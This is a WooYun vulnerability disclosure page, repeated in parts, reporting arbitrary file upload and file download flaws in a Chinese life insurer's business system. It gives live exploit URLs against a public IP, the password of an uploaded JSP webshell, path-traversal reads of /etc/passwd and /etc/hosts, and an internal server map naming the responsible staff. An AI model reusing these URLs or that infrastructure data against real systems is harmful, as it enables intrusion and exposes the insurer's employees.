国华人寿某业务系统漏洞打包 | wooyun-2015-0126092| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0126092

漏洞标题：国华人寿某业务系统漏洞打包

漏洞作者：路人甲

提交时间：2015-07-11 10:09

修复时间：2015-07-16 10:10

公开时间：2015-07-16 10:10

漏洞类型：文件上传导致任意代码执行

危害等级：高

自评Rank：20

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-07-11：细节已通知厂商并且等待厂商处理中
2015-07-16：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

任意文件上传+任意文件下载漏洞

详细说明：

寿险业务系统
http://59.151.39.85/pre/

1#任意文件上传
在扫描该系统的时候，我发现了一个url
http://59.151.39.85/pre/upload/default.htm

点进去好像还可以上传
http://59.151.39.85/pre/upload/sample1.htm

上传成功，但坑爹的是没有回显

自己尝试了一下，发现就在当前上传目录
http://59.151.39.85/pre/upload/wooyun.jpg

然后，我试了一下直接上传jsp
http://59.151.39.85/pre/upload/01.jsp

密码：woo9yun
成功连接

服务器
 使用空间
 所属人
 
10.32.48.32(电子商务)
 正常
 张智泓、傅士琪
 
10.32.76.85 (电子商务) 
 正常
 张智泓、傅士琪
 
10.32.76.83(电子商务)
 正常
 张智泓、傅士琪
 
10.56.96.22(电子商务)
 正常
 张智泓、傅士琪
 
10.56.48.31(电子商务)  
 正常
 张智泓、傅士琪
 
10.32.75.101(核心数据库)
 正常
 DBA
 
10.32.75.102(银保通数据库)
 正常
 DBA
 
10.32.76.110（B节点）
 正常
 DBA
 
10.56.80.41 (C节点)
 94%
 DBA
 
10.32.76.90（核心）
 正常
 曾智超
 
10.32.76.73（核心）
 正常
 曾智超
 
10.32.76.74（核心）
 正常
 曾智超
 
10.32.76.71（核心）
 正常
 曾智超
 
10.32.76.75（核心）
 90%
 曾智超
 
10.32.76.76（核心）
 正常
 曾智超
 
10.32.76.121（核心） 正常
 曾智超
 
10.56.80.176（核心）
 正常
 曾智超
 
10.56.80.177（核心）     
 正常
 曾智超
 
10.32.76.72（核心）
 正常
 曾智超
 
10.32.48.37（兼业）
 正常
 曾智超
 
10.32.48.39（兼业）
 正常
 曾智超
 
10.32.48.40（兼业）
 正常
 曾智超
 
10.32.76.22（营销报表）
 正常
 曾智超
 
10.32.76.56（河南农信）
 正常
 曾智超
 
10.32.76.55（保联天下）
 正常
 曾智超
 
10.32.76.11(工行后置批处理)
 正常
 曾智超
 
10.32.76.12(农行后置批处理)
 正常
 曾智超
 
10.32.76.13(建行后置批处理)
 正常
 曾智超
 
10.32.76.14(邮储后置批处理)
 正常
 曾智超
 
10.32.76.15(工行银保通核心)
 正常
 曾智超
 
10.32.76.16(农行银保通核心)
 正常
 曾智超
 
10.32.76.17(建行银保通核心)
 正常
 曾智超
 
10.32.76.18(邮储银保通核心)
 正常
 曾智超
 
10.32.16.19 (邮政银行前置机)
 正常
 曾智超
 
10.32.16.20(河北建行前置机)
 正常
 曾智超
 
10.32.16.21(湖北建行前置机)
 正常
 曾智超
 
10.32.16.23(天津建行前置机)
 正常
 曾智超
 
10.32.76.77(团险导入服务器)
 正常
 崔连喜
 
10.32.76.27(第三方BPM服务器)
 正常
 曾智超
 
10.32.76.162(农行后置)
 正常
 曾智超
 
10.32.76.161(工行后置)
 正常
 曾智超
 
10.32.76.155(中行银保通核心)
 正常
 曾智超
 
10.32.76.154(中行后置)
 正常
 曾智超
 
10.32.76.126(邮储后置)
 正常
 曾智超
 
10.32.76.125(建行后置)
 正常
 曾智超
 
10.32.76.122(电子商务（电销新流程）前置机)
 正常
 曾智超
 
10.32.48.70(重庆民亚前置)
 正常
 曾智超
 
10.32.48.69(辽宁凯塔前置)
 正常
 曾智超
 
10.32.48.67(湖北民航凯亚前置)
 正常
 曾智超
 
10.32.48.64(慧保网前置)
 正常
 曾智超
 
10.32.48.63(金伦前置)
 正常
 曾智超
 
10.32.48.61(湖南航意险)
 正常
 曾智超
 
10.32.48.42(保联天下前置机)
 正常
 曾智超
 
10.32.48.41(Ehome前置机)
 正常
 曾智超
 
10.32.32.210(河南农信社前置机)
 正常
 曾智超
 
10.32.16.86(中行前置机)
 正常
 曾智超
 
10.32.16.48(中行前置机（新流程）)
 正常
 曾智超
 
10.32.16.47(农行前置机LifeKeeper备份（新流程）)
 正常
 曾智超
 
10.32.16.46(中行前置机LifeKeeper备份（新流程）)
 正常
 曾智超
 
10.32.16.18(工行前置机（新上海）)
 正常
 曾智超
 
10.32.16.17(农行前置机（新上海）)
 正常
 曾智超
 
10.32.16.13(华夏银行生产前置（新上海）)
 正常
 曾智超
 
10.32.16.11(湖南建行前置机（新上海）)
   
10.32.66.23(投资系统)        正常             赵峰                
10.32.76.59(监控服务器)          正常           田伟
10.32.48.75(电子商务)        正常          张智泓、傅士琪
10.32.76.106(电子商务)      正常         张智泓、傅士琪
10.32.76.102(电子商务)     95%         张智泓、傅士琪
10.32.76.109(电子商务)     91%         张智泓、傅士琪
10.32.76.148（核心）
 正常
 曾智超
 
10.32.76.152（核心）
 正常
 曾智超
 
 
10.32.76.179（核心）
 90%
 曾智超
 
10.32.48.47（ERP）
 正常
 王磊
 
10.32.48.73（ERP）
 正常
 王磊
 
10.32.48.29（ERP）
 正常
 王磊
 
10.32.48.175（ERP）
 正常
 王磊
 
10.32.48.111（ERP）
 正常
 王磊     、
 
10.32.48.132（ERP）
 正常
 王磊
 
10.32.48.82  (在线支付系统)      正常         赵峰  傅士琪
10.32.76.169 (在线支付系统)      正常         赵峰  傅士琪
10.32.48.83  (在线支付系统)      正常         赵峰  傅士琪
10.32.76.170 (在线支付系统)      正常         赵峰  傅士琪
10.32.48.81（电子商务）
      正常
     张智泓 
 
10.32.76.168（电子商务）
      正常
     张智泓 
 
10.56.81.55 (C节点)
     95%
     DBA

漏洞证明：

2#任意文件下载

http://59.151.39.85/pre/f1print/F1PrintKernelJ1.jsp?&RealPath=/etc/hosts

与我之前提交的漏洞 WooYun: 国华人寿某系统存在任意文件下载漏洞同一套系统，但不同ip
比如
http://59.151.39.85/pre/f1print/F1PrintKernelJ1.jsp?&RealPath=/etc/hosts

显示的是

# Do not remove the following line, or various programs # that require network functionality will fail. 127.0.0.1 10_32_48_41.localdomain localhost 10.32.48.41 10_32_48_41.localdomain localhost ::1 localhost6.localdomain6 localhost6

而http://broker.guohualife.com/f1print/F1PrintKernelJ1.jsp?&RealPath=/etc/hosts显示的是

# Do not remove the following line, or various programs # that require network functionality will fail. 127.0.0.1 localhost.localdomain localhost ::1 localhost6.localdomain6 localhost6 10.32.48.37 10_32_48_37.localdomain

所以没有重复哈

http://59.151.39.85/pre/f1print/F1PrintKernelJ1.jsp?&RealPath=/etc/passwd

修复方案：

上传点过滤，或者加访问权限，下载过滤../

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2015-07-16 10:10

厂商回复：

漏洞Rank：15 (WooYun评价)

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0126092

漏洞标题：国华人寿某业务系统漏洞打包

相关厂商：95549.cn

漏洞作者：路人甲

提交时间：2015-07-11 10:09

修复时间：2015-07-16 10:10

公开时间：2015-07-16 10:10

漏洞类型：文件上传导致任意代码执行

危害等级：高

自评Rank：20

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0126092

漏洞标题：国华人寿某业务系统漏洞打包

相关厂商：95549.cn

漏洞作者： 路人甲

提交时间：2015-07-11 10:09

修复时间：2015-07-16 10:10

公开时间：2015-07-16 10:10

漏洞类型：文件上传导致任意代码执行

危害等级：高

自评Rank：20

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0126092"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云